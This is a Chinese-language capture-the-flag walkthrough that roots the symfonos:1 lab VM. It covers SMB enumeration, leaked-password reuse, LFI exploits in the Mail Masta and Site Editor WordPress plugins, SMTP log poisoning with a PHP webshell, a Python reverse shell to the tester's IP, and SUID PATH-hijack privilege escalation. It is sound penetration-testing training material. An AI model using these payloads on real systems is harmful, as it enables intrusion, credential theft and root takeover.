本文内容纯属虚构，B站攻略鸭求关注点赞支持！

将靶机网络连接设置成为NAT。

靶机地址：192.168.31.145

测试机IP地址：192.168.31.37

外部信息收集

访问http://192.168.31.145/只显示了一个图片。

目录结构

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.145/FUZZ
http://192.168.31.145/manual/
http://192.168.31.145/image.jpg
http://192.168.31.145/index.html

端口扫描

PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
25/tcp  open  smtp        syn-ack ttl 64 Postfix smtpd
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Issuer: commonName=symfonos
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian

137/udp open  netbios-ns udp-response ttl 64 Samba nmbd netbios-ns

SMB空口令登录

$  smbclient -L 192.168.31.145
Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
helios          Disk      Helios personal share
anonymous       Disk      
IPC$            IPC       IPC Service (Samba 4.5.16-Debian)

smbclient "\\\\192.168.31.145\IPC$"
smb: \> ls

smbclient "\\\\192.168.31.145\anonymous"
smb: \> ls
attention.txt
smb: \> get attention.txt

smbclient "\\\\192.168.31.145\helios"
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED

smbclient "\\\\192.168.31.145\print$"
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED

也可以不用smbclient，直接kali文件夹访问smb://192.168.31.145/

查看attention.txt内容

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'!
Next person I find using one of these passwords will be fired!
-Zeus

尝试使用泄露的SMB口令访问

smbclient "\\\\192.168.31.145\helios" -U helios%qwerty
smb: \> ls
research.txt                        A      432  Fri Jun 28 20:32:05 2019
todo.txt                            A       52  Fri Jun 28 20:32:05 2019
smb: \> get research.txt
smb: \> get todo.txt

查看research.txt内容

Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.

未发现可用内容

查看todo.txt内容

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

发现/h3l105目录

WordPress

访问http://192.168.31.145/h3l105/发现一个WordPress页面

sudo wpscan --url http://192.168.31.145/h3l105/ --enumerate vt,vp,u
WordPress version 5.2.2 identified (Insecure, released on 2019-06-18)
用户名admin
http://192.168.31.145/h3l105/wp-content/uploads/

对该页面使用BurpSuite抓包看到向服务器发请求时会请求域名symfonos.local

修改/etc/hosts：

192.168.31.145 symfonos.local

$ sudo wpscan --url http://symfonos.local/h3l105/ Plugin(s) [+] mail-masta  | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/  | Latest Version: 1.0 (up to date)  | Last Updated: 2014-09-19T07:52:00.000Z [+] site-editor  | Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/  | Latest Version: 1.1.1 (up to date)  | Last Updated: 2017-05-02T23:34:00.000Z

搜索很验证WordPress插件漏洞

searchsploit wordpress mail masta ------  Exploit Title                                                               |  Path ------ WordPress Plugin Mail Masta 1.0 - Local File Inclusion                       | php/webapps/40290.txt WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)                   | php/webapps/50226.py WordPress Plugin Mail Masta 1.0 - SQL Injection                              | php/webapps/41438.txt searchsploit wordpress site editor $ searchsploit wordpress site editor ------  Exploit Title                                                               |  Path ------ WordPress Plugin Site Editor 1.1.1 - Local File Inclusion                    | php/webapps/44340.txt WordPress Plugin User Role Editor 3.12 - Cross-Site Request Forgery          | php/webapps/25721.txt searchsploit -m 40290.txt PoC http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd 存在LFI searchsploit -m 50226.py python2 50226.py ~# http://symfonos.local/h3l105 [*] Checking if the Mail-Masta endpoint is vulnerable... [!] Endpoint vulnerable! searchsploit -m 41438.txt http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/lists/csvexport.php sqlmap -u "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0*&pl=/var/www/html/wordpress/wp-load.php" --batch 验证失败 searchsploit -m 44340.txt PoC：http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd 存在LFI 结果 root:x:0:0:root:/root:/bin/bash lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin ... irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin sshd:x:107:65534::/run/sshd:/usr/sbin/nologin helios:x:1000:1000:,,,:/home/helios:/bin/bash mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false postfix:x:109:115::/var/spool/postfix:/bin/false

利用LFI漏洞

尝试：

http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=php://filter/convert.base64-encode/resource=../../../../../wp-config.php

失败，经过搭环境测试，猜想是once的原因，更换exp：

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php

得到：

'DB_NAME', 'wordpress' 'DB_USER', 'wordpress'  'DB_PASSWORD', 'password123' 'DB_HOST', 'localhost'

利用该密码尝试连接SSH失败。

SMTP日志投毒使LFI实现RCE

利用LFI尝试读取Apache日志：http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/log/apache2/access.log

利用LFI尝试读取SMTP日志：http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios

发现可以读取SMTP日志。

$ nc 192.168.31.145 25 220 symfonos.localdomain ESMTP Postfix (Debian/GNU) MAIL FROM:asdf 250 2.1.0 Ok RCPT TO:helios 250 2.1.5 Ok data 354 End data with <CR><LF>.<CR><LF> <?php system($_GET["cmd"]);?> . 250 2.0.0 Ok: queued as 9ABDC4084A QUIT 221 2.0.0 Bye http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&cmd=id uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

getshell

nc -nvlp 443 http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.37",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' python -c 'import pty;pty.spawn("/bin/bash")'

权限提升

本地信息收集

find / -perm -u=s -type f 2>/dev/null /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/bin/passwd /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /opt/statuscheck /bin/mount /bin/umount /bin/su /bin/ping

statuscheck

cat /opt/statuscheck 看不出内容 file /opt/statuscheck /opt/statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped strings /opt/statuscheck /lib64/ld-linux-x86-64.so.2 libc.so.6 system __cxa_finalize __libc_start_main _ITM_deregisterTMCloneTable __gmon_start__ _Jv_RegisterClasses _ITM_registerTMCloneTable GLIBC_2.2.5 curl -I H http://lH ocalhostH

劫持环境变量提权

cd /tmp
echo "int main(void) {" > curl.c
echo -e "\tsetgid(0); setuid(0);" >> curl.c
echo -e "\texecl(\"/bin/sh\",\"sh\",0);" >> curl.c
echo "}" >> curl.c

cat curl.c
int main(void) {
       setgid(0); setuid(0);
       execl("/bin/sh","sh",0);
}

helios@symfonos:/tmp$ gcc curl.c -o curl
gcc curl.c -o curl
curl.c: In function 'main':
curl.c:2:2: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
 setgid(0); setuid(0);
 ^~~~~~
curl.c:2:13: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
 setgid(0); setuid(0);
            ^~~~~~
curl.c:3:2: warning: implicit declaration of function 'execl' [-Wimplicit-function-declaration]
 execl("/bin/sh","sh",0);
 ^~~~~
curl.c:3:2: warning: incompatible implicit declaration of built-in function 'execl'

env
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export PATH=/tmp:$PATH
env
PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

/opt/statuscheck
id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(helios)

其他

flag

cat /root/proof.txt
Congrats on rooting symfonos:1!